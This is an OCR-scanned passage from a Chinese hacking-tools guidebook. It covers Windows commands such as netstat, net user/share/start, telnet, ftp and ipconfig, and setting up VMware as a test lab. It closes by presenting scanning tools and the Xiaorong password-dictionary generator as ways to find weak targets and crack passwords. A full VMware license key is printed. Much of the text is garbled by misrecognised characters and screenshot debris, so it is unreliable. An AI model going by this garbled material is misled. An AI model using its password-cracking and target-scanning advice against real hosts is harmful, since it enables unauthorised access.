IPv4 统计 信息 〈 对 于 IP、ICMP、TCP 和 UDP 协议 ) 以 及 IPv6 统计 信息 (对 于 IPv6、 
ICMPv6、 通 过 IPv6 的 TCP 以 及 通过 IPv6 的 UDP 协议 )。 使 用 时 如 果 不 带 参数 ，netstat 
将 显示 活动 的 TCP 连接 。 

下 面 再 介绍 几 个 netstat 命令 的 应 用 实例 ， 具 体 如 下 。 

1) 看 想 要 显示 本 机 所 有 活动 鸭 TCP 连接 ， 以 及 计算 机 侦 听 的 TCP 和 UDP 病 口 ， 则 
应 输入 “netstat -a” 命 令 。 

2) 显示 服务 器 活动 的 TCP/IP 连接 ， 则 应 输入 “netstat -n” 命 令 或 “netstat 〈 不 市 任何 
参数 )” 命 令 。 


国 管理 郧 ; CNWindewmws\system32crmnd exe - netstat -a | | © my 国 管理 丙 - CMWindows\system37\ermd.exe Ol Xe 
| rb inadat 人 和 下 二 KE 
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1 要.131H27 
127.0.0.1:1H29 
127.9..1:1031 

了 -日 .本 -1313 


i127.80.0.1:1W76 
i127.0.8.1:1H77 
127.0.8.1:1516 
i127.0.3.1:1517 
i120.0.8.1:12419 
i127.0.8.1:12422 
.1 14423 
127.0.0.1:12424 
i121.0.8.1 121442 
27.0.0.1:12430y 
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Ef HY: 
J2.16H .1 .1Yy:1 半 47 | 


显示 本 机 所 有 活动 的 TCP 连接 显示 服务 器 活动 的 TCP/IP 连接 


19 上 号 


NTZI Pe > 


工具 全 攻略 


合 人 他 他 


3) 显示 以 太 网 统计 信息 和 所 有 协议 的 统计 信息 ， 则 应 输入 “netstat -s -e” 命 令 。 
4) 检查 路 由 表 确 定 路 由 配置 情况 ， 则 应 输入 “netstat -rn” 命 令 。 
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| 


接收 鸭 
有 十 heror NRB1IS1 PCI~E Giugabit t he rr Cont ro Pi 
R91332416 )1S 6 
此 9 从 9 所 各 bs PP phack lnterface 1 
| F i12...80 Ba DR BR BB 95 HH eH Microsoft If :nTnP dn pt 
13.. -MI HH Hy BH BH By 65 I 1 Us any | 


厅 - 上 月 -有 .和 夺 . 本 .时 .日 
i127.0.8 .9 255 .HH.H.H 
?7.0.0.1 #05 255 255 .255 

TES 285 2255 
192.16H.1 .9 5, 
192.168.1 .1 255 .2 
时 : BR.1 -25 了 
| 


| :后 
与 和 .55 与 。 交 与 所 


显示 以 太 网 统计 信息 忆 确定 路 由 配置 情况 


但 ;4 工作 组 和 域 的 net 命令 


net 命令 是 一 种 基于 网 络 的 命令 ， 该 命令 包含 了 管理 网 络 环境 、 服 务 、 有 用户、 登录 等 大 
分 重要 的 管理 功能 。 稼 见 的 net 命令 有 net view、net user、net use、net start、net stop、 


net share 等 。 


下 向 来 介绍 这 些 常 用 的 net 子 命 

1. net view 

1) 作用 : 显示 域 列 表 、 计 算 机 列表 或 指定 计算 机 的 共享 资源 列表 。 
2) 命令 格式 : net view [\\computername|/domain[:domainname]] 
@ 不 市 参数 的 net view: 显示 当前 域 的 计算 机 列表 。 

@ \computername: 指定 要 但 看 其 共 娃 资源 的 计算 机 名 称 。 

@ /domain[:domainname]: 指定 要 查看 其 可 用 计算 机 的 域 。 


管理 员 : C\Windows\system32\cmd.exe = 有 9 


C: WNET VIEY ZKG 


al ee a Print 
ssional Mi136 MFP 
J)isk 


1 

} 
isk 

k 


查看 指 定 计算 机 的 共 共享 资源 


2. net user 
1) 作用: 添加 或 更 改 用 户 账 亏 或 显示 用 户 账 亏 信 息 。 该 命令 也 可 以 写 为 net users。 


) 命令 格式 : net user[username [password | *] [options]][/domain] 


username{ password | *}/add[loptions] [/domain] 
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username[/delete] [/domainl] 

@ 不 市 参数 的 net user: 全 看 计算 机 上 的 用 户 账 号 列表 。 

@ Username: 瀛 加 、 删 除 、 更 改 或 伟 看 用 户 账 号 名 。 

@ Password: 为 用 户 账号 分 配 或 更 改 密码 ,密码 必须 满 中 net accounts 命令 的 /minpwlen 
选项 的 密码 最 小 长 有 展 ， 最 多 可 以 有 127 个 字符 。 

@ *: 提示 输入 密码 。 当 用 户 在 密码 提示 符 下 输入 密码 时 ， 密 但是 不 会 显示 的 。 

@ /add 和 /delete: 添加 和 删除 用 户 账 户 。 

@ /domain: 在 计算 机 主 域 的 主 域 控制 器 中 执行 操作 。 

@ options: 摘 述 Windows 操作 系统 下 的 命令 行 。 


国 管理 员 : CWindows\system32\cmd,exe 


管理 员 : C:\Windows\system32\cmd.exe 


G22net user 


C:\2net user aA add 


、ML8QD1ETPGKU51W 的 用 户 帐 户 


,有 3b “net USEeP asd delete 
dministrator 命令 成 功 FE 成 2 


命令 成 功 完成 。 


查看 计算 机 上 的 用 户 账号 列表 添加 和 删除 用 户 账户 
3. net use 
1) 作用 : 连接 或 断 开 计算 机 与 共 圣 资源 的 连接 ， 或 显示 计算 机 的 连接 信息 。 


2 ) 命令 格式 : net use [devicename | *][\\computername\sharename[\volumel]l] 


[password | *] [/user: [domainame\]username] [/delete]|[/persistent:{yes | no}] 


输入 不 带 参 数 的 net use 表示 列 出 网 络 连接 。 


郴 管理 员 : C\Windows\system32\cmd.exe 


上 “znet TE 


会 记录 新 的 网 络 坟 接 。 


4. net start 


1 ) 命令 格式 : net start server 


3 


一 > 
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命 人 他 他 


2) 作用 : 局 动 服 务 或 显示 已 局 动 服务 的 列表 。 不 市 参数 则 显示 已 打开 服务 。 在 需要 局 
动 一 个 服务 时 ， 只 需 在 后 边 加 上 服务 名 称 束 可 以 了 。 


管理 员 ; C;\Windows\system32\cmd,exe 管理 抽 : CN\WIindows\system32\cmd.exe 


Cnet start 


Hindows J 千 池 : = 


Application Host Helper Service 


Background lntelligent Transfer Service 


WHindows Process Activation Service 
Hindows Search 


Howvhkstation 


World Wide Web Publishing Service 
nLSservicePlatfornm 


mb 


显示 已 启动 的 服务 启动 server 服务 


S. net stop 
1) 作用 : 停止 Windows 网 络 服务 。 与 net start 命令 相反 ，net stop 命令 用 于 停止 
Windows 网 络 服务 。 


2) 命令 格式 : net stop server 


国 管 理 员 : Ci\Windows\system32\cmd,exe 


:nm stop SEPUGF 
Repryupy 服务 正在 俘 止 本 
Ferver 服务 my 停止 


停止 server 服务 


0. net share 
1) 作用 : 创建 、 删 除 或 显示 共 训 资源 。 


2 ) 命令 格式 : net share sharename=drive:pathl[l/users:number|/unlimited] 


[7 enar ke"tet | 


@ 不 市 任何 参数 的 net share 命令 : 显示 本 地 计算 机 上 所 有 共享 资源 的 信息 。 
@ sharename: 共 诗 资源 的 网 络 名 称 。 

@ drive:path: 指定 共 圣 上 日 录 的 绝对 路 和 丛 。 

@ /user:number: 设置 可 以 同时 访问 共 侍 资源 的 最 大 用 户 数 。 

@ /unlimited: 不 限制 同时 访问 共享 资源 的 用 户 数 。 

@ /remark:"text": 添加 关于 资源 的 注释 ， 注 释文 字 用 引号 引起 来 。 


2 


< 第 1 章 
从 零 开 始 认识 黑客 


国 管理 员 : CNWindows\system32\cmd,exe 


CGC:\>net share 
没有 启动 Server 服务 。 


C:\Windows 
JU 


SeErS Gs 
命令 成 功 完成 。 


Hb 


本 地 计算 机 上 所 有 共享 资源 的 信息 


1.4.5 ”23 新 口 登 录 的 telnet 命令 


telnet 是 TCP/TP 网 络 (如 Internet) 的 登录 和 仿真 程序 ， 主 要 用 于 Internet 会 话 。 基 本 
功能 是 允许 用 户 登 录 进 入 远程 主机 系统 。 

telnet 命令 的 格式 为 : telnet+ 空 格 +TP 地 址 /主机 名 称 。 

例如 :“telnet 192.168.1.103 80” 命 令 如 果 执 行 成 功 ， 则 将 从 IP 地 址 为 192.168.1.103 
的 远程 计算 机 上 得 到 Login 提示 符 。 


画 Telnet 192.168.1.103 
Microsoft Windows [hf 本 6-1.?691] os 
hh 皮 可 用 有 《cy 2009 Microsoft Corporation。 慰 贸 所: 


C:“sers™“dninistrator>te lnet 二 字 必 二 证 各 二 二 种 了 3 站 四 
正在 连接 192.168-1-163.- -。 


当 telnet 成 功 连接 到 远程 系统 上 时 ， 将 显示 登录 信息 并 提示 用 户 输入 用 户 名 和 口令 。 
如 采用 户 名 和 口令 输入 正确 ， 则 可 成 功 登 录 并 在 远程 系统 上 工作 。 在 telnet 提示 和 从 后 可 输 
入 很 多 命令 ， 用 来 控制 telnet 会 话 过 程 。 在 telnet 提示 下 输入 “? ” 屏幕 显示 telnet 命令 
的 帮助 信息 。 


1.4.6 传输 协议 即 命令 


ftp 命令 是 Internet 用 户 使 用 最 频 坚 的 命令 之 一 , 通过 ftp 命令 可 将 文件 传达 到 正在 运 


“0 


> 


Py 
2 工具 全 攻略 


人 人 人 他 
行 FTP 服务 的 远程 计算 机 上 ， 或 从 正在 运行 FTP 服务 的 远程 计算 机 上 下 载 文件 。 在 “ 命 
令 提 示 符 ”窗口 中 运行 ftp 命令 ， 或 在 “运行 ”对 话 框 中 运行 ftp 命令 ， 即 可 进入 FTP 子 
环境 窗口 。 


上 到 管理 员 : C\Windows\system32\cmd.exe - ftp 


Microsoft Windows [hRR 汪 6-1-?681] 


h 原 林 PF- 有 有 “C2 2069 Microsoft Gorporation. 保生 


日 


CG:“Users dmninistrator2ftp 
ftp» 


进入 FTP 子 环境 窗口 


FTP 的 命令 行 格式 为 : ftp -v -n -qd -g 
@ -v: 显示 远程 服务 器 的 所 有 啊 应 信息 。 
@ -n: 限制 FTP 的 目 动 登录 ， 即 不 使 用 。 
@ -d: 使 用 调试 方式 。 

@ -g: 取消 全 局 文件 名 。 


[主机 名 ] 。 


14.7 查看 网 络 配 置 的 jpc0ntis 命令 


ipconfig 是 调试 计算 机 网 络 的 常用 命令 ， 通 常 大 家 使 用 它 显示 计算 机 中 网 络 适配器 
的 IP 地 址 、 子 网 掩 码 及 默认 网 天 ， 这 是 ipconfig 的 不 带 参 数 用 法 。 和 常见 的 用 法 还 有 
ipconfig/all。 


国 背 加 遇 : CA WIndows\system3 Temdere 


P| 管理 员 : 蕊 Mn \ oysterm3i\e md ee 


DCPs a 2 | 
-| LHCPuE 这 ID .ND + 
二 


在 “命令 提示 符 ” 窗 口中 运行 ijpconfig 命令 ， 查 看 ”在 “命令 提示 符 ” 窗 口中 运行 ipconfig/all 命 令 ， 查 


当前 计算 机 的 |Pv4 和 |Pv6 地 址 、 子 网 掩 码 以 及 默认 
网 关 等 信息 。 


看 当前 计算 机 的 IP 地 址 、 子 网 掩 码 、DNS 后 级 和 
DHCP 等 信息 。 
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1.5 ”在 计算 机 中 创建 虚拟 测试 环境 


在 测试 和 和 学习 黑客 工具 操作 方法 时 ， 痢 不 会 拿 实 体 计 算 机 来 尝试 ， 而 是 在 计算 机 中 搭 
建 虚 拟 环境 ， 即 在 目 己 已 存在 的 系统 中 ， 利 用 虚拟 机 创建 一 个 内 在 的 系统 。 该 系统 可 以 与 


外 界 独立 ,但 与 已 经 存在 的 系统 建立 网 络 关 系 ， 从 而 方便 使 用 东 些 黑客 工具 进行 便 拟 攻击 ， 
并 且 一 旦 黑客 工具 对 虚拟 机 造成 了 人 破坏， 也 可 以 很 快 恢复 ， 且 不 会 影响 目 己 本 来 的 计算 机 


系统 ， 使 操作 更 加 安全 。 


15 安装 VMWare 虚拟 机 


目前 , 虚拟 化 技术 已 经 非常 成 熟 , 伴随 看 产品 如 雨后春笋 般 地 出 现 , 如 VMware、Virtual 
PC、Xen、Parallels、Virtuozzo 等 , 但 最 流行 、 最 常用 当 属 VMware 了 。VMware Workstation 
是 VMware 公司 的 专业 虚拟 机 软件 ， 可 以 “虚拟 ” 现 有 任何 操作 系统 ， 而 且 使 用 简单 、 容 
易 业 

安装 VMware Workstation 10.0.0 的 具体 操作 步骤 如 下 。 
STEP01: 启动 VMware Workstation 10.0.0 STEP02: 设置 安装 类 型 


VMware Workstation 安装 VMware Werkstation 安装 


欢迎 使 用 VMware Workstation 安装 向 导 设置 类 型 


选 竹 景 适合 告 需 买 的 设 桂 关于 . 
雪 获 同 导 将 在 您 的 计算 机 上 去 攻 VMware Workstation。 要 竺 纺 ， 
请 单 击 “ 下 一 步 : 。 


敬告; 此 程序 受 版 权 法 和 国际 条 约 保 护 . 


Vimware 
Workstation 


在 安装 向 导 界 面 中 单 击 “ 下 一 步 ”按钮 。 选择 典型 模式 ， 然 后 单 击 “下 一 步 ” 按 钮 。 
STEP03: 设置 安装 路 径 STEP04: 选择 要 安装 的 文件 夹 


VMware Workstation 安装 


目标 文件 夹 | ee 
单 击 “ 下 一 步 ” 去 获 到 汞 文件 兴 ， 或 单 击 “有 更改” 去 获 到 其 他 文件 夹 。 民 。 Select ar install directory 


- 将 VMware Workstation 去 荣 到 : ”县 Administrator 


”DD:\ 家 六 


单 击 “ 更 改 ” 按 钮 。 选中 安装 位 置 后 单 击 “ 确 定 ” 按 钮 。 
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人 SEO 
STEP05: 返回 “目标 文件 夹 ” 界 面 STEP06: 设置 快捷 方式 


VMware Workstation 安装 


VMware Werkstation 安装 


目标 文件 去 
单 击 “ 下 一 步 ” 安装 到 就 文件 夹 ， 或 单 击 “ 更 发 ”去 区 到 其 他 文件 夹 。 


快捷 方式 
选 舞 您 要 放 入 系统 的 快捷 方式 - 


将 VMware Workstation 安 蔡 到 : 在 以 下 世 置 创建 VMware Workstation 的 铁 捷 方式 - 


Di 志和 获 


单 击 “ 下 一 步 ” 按 钮 。 根据 需要 勾 选 这 两 个 复 选 框 。 国 单 击 “ 下 一 
步 ”按钮 。 
STEP07: 准备 安装 STEP08: 正在 安装 


VMware Workstation 安装 VMware Workstation 安装 


已 准备 好 执行 请 求 的 操作 A 正在 执行 请 求 的 操作 


单 击 “ 摆 综 ' 开 妈 总 进 程 . 
请 等 待 向 导热 行 请 求 的 操作 。 这 可 能 吕 妥 几 分 钟 时 间 . 
如 采 肥 查看 或 更 改 任意 安 准 设置 ， 谤 音 击 “上 一 步 ”. 单 击 “ 职 清 ” 可 退出 疝 导 。 


状态 : Instaling packages on the system 
Preparing list of required operations 


单 击 “ 继 续 ” 按 钮 。 查看 安装 进度 。 
STEP09: 输入 许可 证 密 铀 STEP10: 成 功 安装 


VMware Workstation 安装 VMware Workstation 安装 


答 入 许可 证 密 钥 A 安装 向 导 完 成 
(可 选 ) 您 可 以 稍 后 二 输入 此 信息 . 


I 志 获 间 导 已 或 功 完成 与 VMware Workstation 相关 的 操作 。 单 击 
许可 证 密 钢化 ): (XXXXX-XXXXX-XXXXX-XXXXX-XXXXX) 有 “ 充 成 退出 向 对- 


1V652-6AJE2-DZF59-8T370-A2UQX 


VImWare 

Workstation 
在 文本 框 中 输 单 击 “ 输 入 ”按钮 。 单 击 “ 完 成 ”按钮 。 
入 许可 证 密 钥 。 
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STEP11: 重新 启动 计算 机 STEP12: 打开 “设备 管理 器 ”窗口 
— ele 文件 (月 ”把 作 (A) ” 辣 春 (V) ”帮助 (H) 
旬 罗 | 丽 | 回国 | 到 
4 过 4L8QD1ETPGKV51W | 

1 IDE LS 控制 器 


ES 网 六 、 控 # 面 抽 、 网 络 和 Internet 、 网 阁 和 共享 中 心 a E22 
文件 日 查看 W ”工具 中 帮助 由 一 ] 
控 而 村 主页 : 


4L8QDlETPGKV51W 
此 计算 机 


更 改 适 配 匡 设置 
更 改 高 级 共享 设 千 王者 活动 网 洛 


网 络 3 
| 内” 容许 网 络 


; 二 端口 (COM 和 LPT) 
调 计算 机 
”监视 器 


, -二 键盘 
> 让 时 软盘 驱动 器 控制 器 
; - 炸 声音 、 视 频 和 游戏 控制 器 
b) -网 饼 标 和 其 他 指针 设备 
-和 通用 率 行 总 线 控制 器 
寺 网 络 适 配器 
| "Atheros AR8151 PCI-E Gigabit Ethernet Controller (NDIS 6.20) 


| 了 VMware Virtual Ethernet Adapter for VMnet1 
|- 镭 VMware Virtual Ethernet Adapter for VMnet8 


更 改 网 阁 设 于 
i 设 豆 新 的 壬 接 或 网 冶 

”设置 无 线 、 宽 入 、 找 号 临时 或 VPN 渤 按 ; 或 设置 路 由 器 或 沪 问 点 . 
另 请 参阅 
Internet 选项 
Windows 上 防火 培 
家 庭 组 Ca 远 择 家 隆 组 和 共享 过 项 

访问 位 于 其 他 网 络 计 算 机 上 的 文件 和 打印 机 ， 或 更 改 共 享 设置 


各 二 二 网 洛 
连接 到 吗 皇 新 注 接 到 无 线 、 有 线 、 换 号 或 VPN 网 络 连 接 , 


打开 “网 络 和 共享 中 心 ” 窗口 ， 可 看 到 VMware 展开 “网 络 适配器 ”节点 ， 可 以 看 到 添加 的 两 块 虚 
Workstation 添加 的 两 个 网 络 连 接 。 拟 网 卡 。 


15.,2 ”配置 安装 好 的 VMWare 虚拟 机 


在 安装 虐 拟 操作 系统 前 ， 一 定 要 先 配 置 好 VMware 虚拟 机 ， 下 和 面 介 绍 VMware 虚拟 机 
的 配置 过 程 。 
STEP01: 运行 VMware Workstation STEP02: 新 建 虚拟 机 


文件 (F) ”编辑 ([E) 章 看 (V) ”虚拟 机 (M) ”选项 不) 帮助 (H) 
> - | 志 所 夺回 | 台 呈 -局 外 吓 
库 X 
| Q EHAta 和 RE 和 实 > 
2 |]| vmware 


EN Workstation 10 


主页 > 


欢迎 使 用 新 建 虚拟 机 向 导 


您 希望 使 用 什么 类 型 的 配置 ? 
站 。 连接 运 得 服务 器 
| | 在 顽 服务 器 上 埋 看 和 管理 虚拟 机 。 


@ 典型 (推荐 )(T) 
通过 几 个 简单 的 步 又 创建 Workstation 10.0 
拟 机 。 


虑 执 化 物理 机 
| Henan. 
本 外 自 定义 (高级 儿 C) 


吕 


检 喜 VMware Workstation 的 软件 更 新 。 以 及 与 | 日 版 VMware 产 品 兼容 性 等 高 级 选项 
的 虚拟 机 。 


a i 创建 带 有 5CSI 控 制 器 类 型 、 虚 拟 磁盘 类 型 


单 击 “ 创 建新 的 虚拟 机 ”选项 。 选择 配置 类 型 。 单 击 “ 下 一 步 ”按钮 。 
STEP03: 安 痛 客户 机 操作 系统 STEP04: 选择 客户 机 操作 系统 


安装 客户 机 操作 系统 选择 客户 机 操作 系统 
虚拟 机 如 同 物理 机 ， 需 要 操作 系统 。 您 将 如 何 安装 客户 机 操作 系统 ? 此 虚拟 机 中 将 安装 哪 种 操作 系统 ? 


局 究 装 程序 光盘 映像 文件 (isoJ(M): 客户 机 操作 系统 


® Microsoft Windows(W) 
© Linux(L) 

© Novell NetWare(E) 

© Solaris(S) 

© VMware ESX(X) 


加 稍 后 安装 操作 系统 (5)。 
创建 的 虚拟 机 将 包含 一 个 空白 硬盘 。 口 其 他 (0) 


版 本 (V) 


选择 “ 稍 后 安装 操作 系统 ” 单 击 “ 下 一 ”图 选中 一 个 客户 机 单 击 “ 下 一 步 ” 按 钮 。 
单 选 按钮 。 步 ”按钮 。 操作 系统 类 型 。 


Wl 


客 志 
PE 工具 人 攻 了 


全 人 人 他 
STEP05: 命名 虚拟 机 STEP06: 指定 磁盘 容量 
新 建 虚拟 机 向 导 “55500055 EX 


指定 磁盘 容量 
您 要 为 此 虚拟 机 使 用 什么 名 称 ? 磁盘 大 小 为 多 少 ? 


虚拟 机 的 硬盘 作为 一 个 或 多 个 文件 存 情 在 主机 的 物理 磁盘 中 。 这 些 文件 最 初 很 
小 ， 随 着 您 向 虚拟 机 中 添加 应 用 程序 、 文 件 和 数据 而 逐渐 变 大 。 


虚拟 机 名 称 (V): 
最 大 磁盘 大 小 (GB)(S): 60.0 会 


针对 Windows 7 的 建议 大 小 : 60 GB 
位 置 (L): 


D:\Documents\Virtual Machines\Windows 7 | 加 将 虚拟 磁盘 存 铺 为 单个 文件 (O) 

在 "编辑 "> "首选 项" 中 可 更 改 利 认 位 置 。 名 将 虚拟 磁盘 拆 分 成 多 个 文件 (M) 
pi 可 以 更 轻松 地 在 计算 机 之 间 称 动 虚拟 机 ， 但 可 能 会 降低 大 容量 磁盘 的 
性 有 


消 


国 输入 该 虚 国 单 击 " 浏 览 " 按 图 单 击 “ 下 一 指定 最 ” 国 选择 将 虚拟 机 “” 国 单 击 “ 下 
拟 机 的 名 字 。 钮 , 选择 存放 位 置 。 步 ”按钮 。 大 磁盘 大 小 。 存储 为 单个 文件 或 一步” 按钮 。 


分 成 多 个 文件 。 
STEP07: 准备 创建 STEP08: 查看 已 创建 的 虚拟 机 


a 

cy | 有 库 ， 文 籼 Virtual Machines ; Windows7 > 

已 准备 好 创建 虚拟 机 D 
单 击 完成 “创建 虚拟 机 。 然 后 可 以 安装 Windows 7。 


文件 (F) ” 编 加 (E) ” 理 看 (W) 工具 (T) 帮助 (H) 
组 织 共 室 冯 新 建文 件 夫 


将 使 用 下 列 设 置 创建 虚拟 机 : 


Windows 7 

E:\VM 

Workstation 10.0 

Windows 7 

60 GB 

1024 MB 

NAT 

CD/DVD, USB 控制 器 , 打印 机 , 声卡 


LxE-#@) | 


单 击 “完成 ”按钮 ， 即 可 完成 虚拟 机 的 创建 。 进入 虚拟 机 存放 的 路 径 ， 将 会 看 到 已 生成 名 为 
“Windows 7.vmx” 的 虚拟 机 文件 。 


Windows 7.vmx Windows 
Tvmxf 


点 MSN 上 的 “ 宾 的 网 


15.3 安 帮 虚拟 操作 系统 


安装 虚拟 操作 系统 的 具体 操作 步骤 如 下 。 
STEP01: 进入 VMware 主 窗口 STEP02: 打开 安装 虚拟 机 文件 的 位 置 


[3 


BI ~-—-— oe 0 0 
(ANE 和 》 库 > 文档 > Virtual Machines >» Windows 7 - 好 | 条 志 Windows 7 


文件 加” 策 绢 日” 到 看 W。 虚 拉 机 (M) 庄 项 卡 四 帮助 () 
>- | 名 全 名 | 回回 加 局 | 右 
库 x 
| Q 在 此 外 旭 入 内 容 进 行 视 索 | 


会 主 页 x | 


Workstation 10 网 


连接 远程 服务 器 
遇 在 二 得 设 务 器 上 埋 奢 和 管理 志 拟 机 。 


虑 拟 化 物理 机 
| 本 从 现 有 物理 机 创建 去 拟 机 .。 


二 打开 虑 拟 机 
单 击 “ 打 开 虚 拟 机 ”选项 。 选中 “Windows ”图 单 击 “打开 ”按钮 ， 即 
7.vmx” 图 标 。 可 打开 新 创建 的 虚拟 机 。 
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1 


从 妻 开始 认识 黑客 


STEP03: 返回 VMware 主 春 面 STEP04: 虚拟 机 设置 


加 Windows 7 - VMware Workstation 


文件 上 日 。” 妃 短 (日 ”下 看 (W 虚拟 #1UM) 迁 项 上 不 中 必 助 (H) 


| 吉他 加 | 回回 加 局 | 加 
> bb a I 0 设备 状态 
QQ 在 此 处 键入 内 容 进 行 搜 雪 = 由 一 3 *|Bw ” * NS 本 内 存 EE 
Yy 启动 时 连接 (0) 
日 确 我 的 思拓 
全 Windows 和 
品 共享 点 拉 机 有 
) 使 用 物理 3Ez 吃 (P): 


自动 检测 
加 使 用 I50 映像 文件 (M): 


D:\ 支 装 软件 \can_windows 7 v 浏览 (B)..… 


Y 虚拟 机 详细 信息 


状态 : 已 关 贡 
配置 文件 : D:\Documents\Virtual Machines\Windows 7\Windows 7.vmx 
硬件 兼容 性 : 运 拟 机 


在 左 侧 窗 格 中 展开 “Windows 单 击 “ 编 。 选择 “CD/DVD (SATA)” 选 项 ,在 右 侧 “连接 ” 栏 
7”， 在 右 侧 窗 格 中 即 可 看 到 该 主 。” 辑 虚 拟 机 设置 ” 目 中 选择 “使 用 物理 驱动 器 ”或 “使 用 ISO 映 像 文 
机 硬件 和 软件 系统 信息 。 选项 。 件 ” 单 选 按 钮 ， 然 后 单 击 “ 确 定 ”按钮 。 


STEP05: 返回 VMware 主 界 面 


圆 Windows 7 - VMware Workstation 

| 文件 (Fi 编辑 (E) 查看 (V) ”虚拟 机 (M) 选项 卡 (T) ”帮助 (H) 
| 本 -1 豆 | 女 已 节 | 四 加 本 局 | 四 
| 库 x 
| | Q 在 此 处 适 入 内 容 进 行 洋 罕 ~ | 


| 会 主页 x | 吕 Windows 7 x | 


(Windows 7 


国 Windows 7 


曲 共享 虑 拟 机 re 
时 间 和 货币 格式 立 ) 


[SE 


键 盟 和 辆 入 方法 写 ) 


按 实 际 安装 操作 系统 的 方式 进行 ， 即 可 完成 虚拟 机 
系统 的 安 贸 。 


154 。 VMware T00ls 安装 


VMware Tools 是 VMware 提供 的 一 套 贴 心 工 具 ， 用 于 提高 虚拟 显卡 、 虚 拟人 硬盘 的 
性 能 ， 改 善 鼠 标的 性 能 ， 以 及 同步 虚拟 机 与 主机 时 钟 的 驱动 程序 。 安 装 VMware Tools 
不 仅 能 够 提升 虚拟 机 的 性 能 ， 还 可 以 使 鼠标 指针 在 虚拟 机 内 外 上 自由 移动 ， 再 也 不 需要 使 
用 切换 键 了 。 

安装 VMware Tools 的 其 体操 作 方 法 如 下 。 
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全 人 人 他 
STEP01: 尼 动 已 安装 操作 系统 的 虚拟 机 


工具 全 攻略 


VMware Tools 


1 VMWare, Inc. All rights reserved. This productis protected by 
0 E W ang inte 
me VMware 产品 安装 
动 正在 准备 VMware Tools 进行 安装 .… 


国 单 击 虚拟 机 屏 弹出 “VMware 产品 
幕 下 方 的 “安装 安装 " 对 话 框 ， 显 示 准 备 
工具 ”按钮 。 安装 进度 条 。 


STEP03: 选择 安装 类 型 


2 3 机， RE 交 VMware 产 


新 有 各 放 能 。 刘 果 久 送 户 在 种 VMware 产品 上 运行 这 个 


人 安装 哪些 程序 功能 以 及 在 哪里 安装 它们 。 此 选项 供 高 级 


选中 “典型 安装 " 单 选 按钮 。 国 单 击 “下 一 
步 " 按钮 。 


STEP05: 正在 安装 


可 导 正在 安装 VMware Tools， 请 稍 候 。 该 操作 需要 几 分 钟 的 时 
状态 : 
正在 回 滚 操作 ; 


| < 上 一 步 6) | 下 一 步 (N) > | 


系统 开始 安 六 并 显示 安装 进度 。 


STEP02: 安装 向 导 


欢迎 使 用 VMware Tools 的 安装 向 导 


a 最 怕 古人 和 计算 机 上 安装 VMware Tools。 要 继 


警告 : 此 程序 受 版 权 法 和 国际 条 约 保 护 。 


单 击 “下 一 步 ” 按 钮 。 


STEP04: 准备 安装 


Cn 单 击 ` 上 一 步 查 看 或 更 改 任 何 安装 设置 。 单 击 " 取 消退 出 向 


+S®) 


单 击 “安装 ”按钮 。 


STEP06: 安装 完成 


ee WNwars Tools。 点 击 完成 退出 向 


< 上 -58) | [| 福 |][| BM 
单 击 “完成 ”按钮 ， 重 启 系 统 后 即 完成 安装 操作 。 
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黑客 在 进行 攻击 前 ， 常 常会 利用 专门 的 扫描 和 噢 探 工 具 对 目标 计算 机 进行 
扫描 。 在 分 析 目 标 计算 机 的 各 种 信息 之 后 ， 才 会 对 其 进行 攻击 。 本 章 将 介绍 几 
款 常 见 的 扫描 与 噢 探 工具 。 

扫描 工具 和 噢 探 工 具 是 黑客 使 用 最 频繁 的 工具 ， 只 有 充分 学 握 了 目标 主机 
的 详细 信息 ， 才 可 以 进行 下 一 步 操 作 。 同 时 合理 利用 扫描 和 噢 探 工 具 ， 还 可 以 
实现 配置 系统 的 目的 。 


O 常见 的 扫描 工具 
常 


O 常见 的 嗅 探 工具 


O 运用 工具 实现 网 络 监控 


2.1 常见 的 扫描 工具 


墨客 在 确定 攻击 目标 时 ， 通 季 会 使 用 一 些 专门 的 扫描 工具 对 目标 计算 机 或 条 个 IP 
范围 内 的 计算 机 进行 扫描 ， 从 扫 摘 结束 中 分 析 这 些 计 算 机 的 弱 氮 ， 从 而 确定 攻击 目标 和 
攻击 于 段 。 


2.11 扫 摘 服务 与 站 口 


黑客 通过 端口 扫描 器 可 在 系统 中 寻找 开放 的 端口 和 正在 运行 的 服务 ， 从 而 知道 目标 主 
机 操作 系统 的 详细 信息 。 目 前 网 络 中 大 量 主机 /服务 器 的 口令 为 空 或 口令 过 于 简单 ， 黑 客 只 
需 利 用 专用 扫描 器 ， 即 可 轻松 控制 存在 这 种 弱 口 令 的 主机 。 

1. 小 榕 黑客 字典 

所 谓 黑 客 字典 就 是 装 有 各 种 密码 的 破解 工具 ， 通 常情 况 下 ， 只 要 知道 本 地 文件 的 内 容 
就 可 以 运用 黑客 字典 将 其 破解 。 当 然 ， 黑 客 字 典 文件 的 好 坏 直接 关系 到 黑客 是 否 能 破解 对 
方 的 密码 ， 以 及 花费 多 少时 间 破 解密 码 。 

小 榕 黑 客 字 典 是 一 球 功 能 强大 、 可 根据 用 户 需 要 任意 设 定 包 含 字 符 、 字 符 串 的 长 度 等 
内 容 的 黑客 字典 生成 器 。 其 具体 操作 方法 如 下 。 


STEP01: 运行 “UltraDict.exe” STEP02: 切换 到 “选项 ”选项 卡 


ly 字母 ly 数字 


字母 采 用 大 与 形式 
后 -| 个 字母 区 -个 数字 人 


厂 公公 首 字母 大 写 
从 及 =| 至 区 =] 厂 数字 在 字母 前 


有 国王 上 本 全 三 以 避 使 用 IF 间 隅 
1 厂 仅仅 使 用 辅音 字母 


厂 符号 Dx20 Ox2E 
选项 卡 


弹出 “字典 设置 ”对 话 框 ， 在 “设置 ” 选项 卡 中 可 选 ”根据 特殊 需要 勾 选 相应 复 选 框 。 
择 生 成 字符 串 包 含 的 字母 或 数字 及 其 范围 。 
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STEP03: 切换 至 “高 级 选项 ”选项 卡 STEP04: 切换 至 “文件 存放 位 置 ”选项 卡 


设置 “| 选项 “| 文件 存放 位 置 ”高 级 选项 | 
字 母 位 置 ¥: abcdefghijklImnopqrstuywxyz 


M1 M2 M3 m4 5 : Y: 0123456789 
WHO968 0 


abcdefghijklImnopqrstuywxyz 
abcdefghijklImnopqrstuywxyz 


0123456789 


abcdefghijklImnopqrstuywxyz 


0123456789 


E34 黑 客 资 料 \ 小 榕 黑客 字 生 2 破 瞬 版 HACK.DIC 


1830281K 


959300K 开始 | 


将 字母 、 数 字 或 符号 位 置 进行 固定 。 指定 字典 文件 保存 位 置 之 后 ， 站 直 “gp 
单 击 “ 确 定 ”按钮 ， 会 显示 所 设 始 ” 按 钮 。 
置 的 字典 文件 属性 。 


STEP05: 生成 字典 


